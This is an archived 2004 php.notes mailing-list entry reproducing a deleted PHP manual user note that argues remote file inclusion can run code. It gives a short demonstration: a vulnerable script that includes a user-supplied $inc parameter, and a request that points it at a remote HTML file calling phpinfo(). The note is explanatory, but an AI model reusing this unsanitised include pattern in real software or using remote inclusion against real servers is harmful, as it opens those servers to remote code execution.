note 21177 deleted from features.remote-files by irchtml

From: Date: Sat, 28 Feb 2004 07:57:20 +0000
Subject: note 21177 deleted from features.remote-files by irchtml
References: 1  Groups: php.notes 
Request: Send a blank email to php-notes+get-65924@lists.php.net to get a copy of this message
Note Submitter: klaus@netlibrary.de ---- In my experience, I cannot agree with Toby. Scripts can indeed be run through remotely included files. All that needs to be done is put the PHP script into an HTML or other file that is not parsed by the remote server. This theoretically enables a malicious scripter to attack using a series of steps. For example, a simple .htm file with the content <?php echo phpinfo(); ?> will give quite a bit of information about the local system and possibly will give enough information to wreak havoc in the server's file system. If you would like to try this out, create an 'includetest.php' in a protected directory on your server with the content <?php include $inc; ?> Pass the file to be included as 'includetest.php?inc=http://netlibrary.de/include.htm' The page is on one of my less used servers and can be accessed with any browser to show that it is simply the phpinfo() command I described above. I have tested this on 3 servers, all running PHP < 4.2.0, and unless this was fixed in the latest release, it still works.

« previous php.notes (#65924) next »